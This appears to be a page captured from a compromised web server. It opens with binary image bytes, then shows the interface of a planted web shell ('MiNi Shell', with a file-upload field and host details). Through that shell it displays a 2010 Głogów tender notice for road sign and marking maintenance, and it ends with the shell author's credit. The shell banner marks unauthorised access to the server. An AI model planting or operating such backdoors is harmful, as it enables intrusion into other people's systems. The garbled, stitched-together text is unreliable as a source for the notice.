JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100119/12639-N-2010.html

<p class="kh_header"><b>Głogów: Bieżące utrzymanie oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu drogowego dróg gminnych i powiatowych w granicach administracyjnych miasta Głogowa</b><br>
<b>Numer ogłoszenia: 12639 - 2010; data zamieszczenia: 19.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu drogowego dróg gminnych i powiatowych w granicach administracyjnych miasta Głogowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Oznakowanie pionowe:
-	przegląd oznakowania tablic z nazwami ulic urządzeń bezpieczeństwa ruchu drogowego gminnych i powiatowych - koszt objawów należy uwzględnić w cenach w kosztorysie ofertowym ( w załączeniu wykaz dróg),
-	objazdy należy wykonywać przynajmniej jeden raz w tygodniu,
-	wymiana uszkodzonych i nieczytelnych znaków drogowych,
-	wymiana uszkodzonych słupków,
-	montowanie nowych słupków i znaków drogowych zgodnie z zaleceniem Zamawiającego,
-	regeneracja nieczytelnych znaków drogowych oraz słupków.
            Wykonawca zobowiązany jest do prowadzenia dziennika konserwacji oznakowania

Wymogi dla Wykonawców bieżącego utrzymania oznakowania pionowego:
a)	uszkodzone znaki ostrzegawcze i zakazu należy wymienić w przeciągu 2 godzin od zgłoszenia,
b)	w przypadku uszkodzenia znaku A-7 lub B-20 wymiany należy dokonać w przeciągu 1 godziny od momentu zgłoszenia,
c)	w przypadku wszystkich innych znaków czas nie może być dłuższy niż 8 godzin od zgłoszenia,
d)	uszkodzone tabliczki z nazwami ulic należy wymienić w przeciągu 4 dni od daty zgłoszenia,
e)	w sytuacjach awaryjnych wymogi określone w pkt. a, b, c obowiązują również w dni wolne od pracy.

Warunki techniczne umieszczania znaków drogowych.

Znaki drogowe na drogach gminnych winny być montowane z grupy M (małe), na drogach powiatowych z grupy S (średnie), znaki A-7 i B-20 powinny mieć taką samą grupę jak znaki na drodze z pierwszeństwem przejazdu, jednak nie mniejszą niż znaki średnie.
Znaki drogowe na ulicach umieszcza się w odległości 0,5 - 2,0 m od krawędzi jezdni na wysokości:
-	2,20 m na chodnikach, ciągach  pieszo-rowerowych, drogach rowerowych, mierząc od dolnej krawędzi tarczy znaku do poziomu powierzchni,
-	2,00 m na poboczu przyległym do jezdni, chodnika, drogi rowerowej - wymiana uszkodzonych słupków,
-	następny znak powinien być umieszczony za poprzedzającym w odległości co najmniej 10 m na drogach w obszarze zabudowanym oraz drogach o dopuszczalnej prędkości poniżej 60 km/h
1.	po prawej stronie jezdni lub nad jezdnią, jeżeli dotyczą jadących wszystkimi pasami ruchu,
2.	nad poszczególnymi pasami ruchu, jeżeli dotyczą jadących tylko tymi pasami ruchu,
3.	po lewej stronie jezdni:
-	jako powtórzenie znaków umieszczonych po prawej stronie na drogach dwujezdniowych, których jezdnie posiadają więcej niż jeden pas ruchu,
-	na drodze jednokierunkowej, przy czym jako obowiązujące dotyczy to znaków D-6, D-6a, D-6b,
4.	na jezdni, jeżeli droga jest zamknięta dla ruchu kołowego lub ruch na niej jest ograniczony,
5.	na wysepkach w obrębie skrzyżowań, jeżeli znak nakazu wskazuje obowiązek jazdy w określonym kierunku
6.	jeżeli znak po lewej stronie jest powtórzeniem znaku umieszczonego po prawej stronie, to powinien znajdować się na tym samym przekroju poprzecznym drogi.

Tarcze znaków drogowych umieszcza się na słupkach ocynkowanych o średnicy 2, i o przekroju kołowym lub eliptycznym zakończonych kapturkiem plastikowym.
Słupki do znaków drogowych należy osadzać na głębokości 0,7 - 1,0 m, klinując je suchym betonem, w taki sposób aby uniemożliwić ich pochylenie lub wyrwanie. Zakończenie słupków winno być zaopatrzone w dwa wąsy, przyspawane po przekątnej.
Dopuszcza się do umieszczania znaków wykorzystywanie słupów linii telekomunikacyjnych, latarni, słupów trakcyjnych i masztów sygnalizatorów oraz ścian budynków.
Tarcze znaków drogowych winny być wykonane z blach stalowych obustronnie ocynkowanych z podwójnie giętą krawędzią pokryte folią odblaskową typu 2

Tablice nazw ulic powinny być pokryte folią odblaskową typu 1 i posiadać wymiary 920x210 mm koloru jasna ultramaryna i winny być montowane na słupkach malowanych proszkowo koloru ciemnoniebieskiego. Tablice z nazwami ulic winny być umieszczone na wysokości 2,5 m mierząc od dolnej krawędzi tarczy znaku do poziomu powierzchni.

Znaki drogowe, urządzenia bezpieczeństwa ruchu oraz ich stosowanie winny spełniać wymogi zawarte w załączniku do Dz. U. Nr 220, poz.2181 z dnia 23 grudnia 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach
W formularzu ofertowym ujęty jest maksymalny zakres przewidywanych robót. Wykonanie i rozliczenie następować będzie wg faktycznych potrzeb.

2. Oznakowanie poziome dróg:
a)	wykonanie oznakowania poziomego farbą chlorokauczukową do oznakowania nawierzchni asfaltobetonowych dróg,
b)	wykonanie oznakowania poziomego metodą grubowarstwową termoplastyczną z dodatkiem mikrokulek szklanych do oznakowania nawierzchni asfaltobetonowych dróg posiadających nowe nawierzchnie, które zostaną wskazane przez Zamawiającego
c)	wykonanie oznakowania poziomego progów zwalniających wykonanych z kostki betonowej typu polbruk farbą chemoutwardzalną z dodatkiem mikrokulek szklanych.

Przed przystąpieniem do odbioru robót wykonawca zobowiązany będzie do przedstawienia atestu na zastosowaną farbę wraz z kserokopią faktury zakupu.

Zamawiający dopuszcza ręczny lub mechaniczny sposób wykonania zamówienia.

Warunki techniczne:
I.	farbę należy nanosić na czyste i suche podłoża bitumiczne. Przed użyciem farbę należy wymieszać
II.	oznakowanie powinno być wykonane w zakresie temperatur powietrza 5-35°C, przy wilgotności względnej powietrza nie przekraczającej 80%,
III.	grubość malowania powierzchni - 0,6 mm (farbą chlorokauczukową),
grubość malowania powierzchni - 0,9 do 3,5 mm (metodą grubowarstwową).
Oznakowanie poziome należy wykonywać poza godzinami szczytu komunikacyjnego. Szczyt komunikacyjny obowiązuje w godzinach 6.00-9.00 oraz 14.00-17.00
Wykonawca odpowiedzialny jest za prawidłowe oznakowanie terenu robót, zapewnienie warunków bezpieczeństwa oraz metody organizacyjno-techniczne stosowane w miejscu prowadzonych robót.
Wykonawca zobowiązany jest do zabezpieczenia ciągłości ruchu pieszego i kołowego w miejscu prowadzonych robót.
Wykonawca nie może powierzyć wykonania przedmiotu zamówienia osobom trzecim bez pisemnej zgody zamawiającego.

UWAGA
W zależności od potrzeb Zamawiającego dopuszcza się zmiany w ilości i asortymencie (zamiennie) w zakresie wyszczególnionym w formularzu cenowym.
Ilości zamienne nie mogą wpłynąć na ceny jednostkowe określone w formularzu cenowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4, 45.23.32.90-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 5.000 zł (słownie: pięć tysięcy złotych/<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	Spełniają wymogi art. 22 ust. 1 ustawy pzp
2)	Nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy pzp
3)	Wykonali w okresie pięciu lat roboty budowlane, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, odpowiadające swym rodzajem robotom budowlanym stanowiącym przedmiot zamówienia.
      Zamawiający za robotę podobną uzna robotę polegającą na wykonaniu minimum 1 roboty budowlanej polegającej na utrzymaniu oznakowania pionowego i poziomego dróg o łącznej wartości co najmniej 100.000 zł netto. 
 4) dysponują lub będą dysponować, osobami posiadającymi uprawnienia do:
-	Kierowania i nadzorowania robót w zakresie budowli dróg i nawierzchni lotniskowych o powszechnie znanych rozwiązaniach konstrukcyjnych lub bez ograniczeń i posiadającymi aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa,
5)  Posiadają środki finansowe w wysokości co najmniej  100.000,00 zł lub zdolność  
      kredytową w wysokości co najmniej 100.000,00 zł .
6) Posiadają ubezpieczenie działalności od OC w zakresie prowadzonej działalności  
     gospodarczej.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych dokumentów na zasadzie spełnia/ nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Formularza ofertowego - zał. Nr 1 
2.   Dowodu wniesienia wadium.
3.	Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru ,w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt 2 ustawy,
4.	Pełnomocnictwo udzielone jednemu z partnerów, przez pozostałych wykonawców, do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku wykonawców wspólnie ubiegających się o niniejsze zamówienie.
5.	Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.	Aktualnego zaświadczenia  właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7.	Oświadczenia o spełnieniu warunków udziału w postępowaniu w trybie art.22 pzp - zał. Nr 2 do SIWZ,
8.	Oświadczenie o braku podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust.1- zał Nr 3 do SIWZ
9.	Oświadczenia na temat wielkości średniego rocznego zatrudnienia u wykonawcy    oraz  liczebności personelu kierowniczego w okresie ostatnich
       3-ch lat przed upływem terminu składania ofert , a w przypadku gdy okres    
       prowadzenia działalności jest krótszy - w tym okresie - zał. Nr 4 do SIWZ.
10.	Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi, wraz z informacjami nt ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacja o podstawie do dysponowania tymi osobami - zał Nr 4 do SIWZ.
      11.   Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia 
       posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania 
        takich uprawnień,
12	  Informacja nt. części zamówienia jakie wykonawca zamierza powierzyć      podwykonawcom- zał. Nr 5 do SIWZ.
13.  Wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania 
      warunku wiedzy i doświadczenia ,wykonanych w okresie ostatnich pięciu lat przed 
      upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest 
      krótszy - w tym okresie, z podaniem ich rodzaju i wartości ,daty i miejsca   
      wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały  
      wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - zał. Nr 6   
     do SIWZ,
      14.  Informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym  
            wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków 
            finansowych w wysokości co najmniej 100.000,00 zł. lub zdolność kredytową 
            wykonawcy na kwotę co najmniej 100.000,00 zł. wystawiona nie wcześniej niż 3  
            miesiące przed upływem terminu składania ofert,
15. Zapłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że 
            wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej    
            działalności związanej z przedmiotem zamówienia,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Głogów
Rynek 10
67-200 Głogów
Referat Zamówień Publicznych, pok. 314 - III piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2010 godzina 09:00, miejsce: Urząd Miejski Głogów
Rynek 10
67-200 Głogów
Sekretariat, pok. 125 - I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com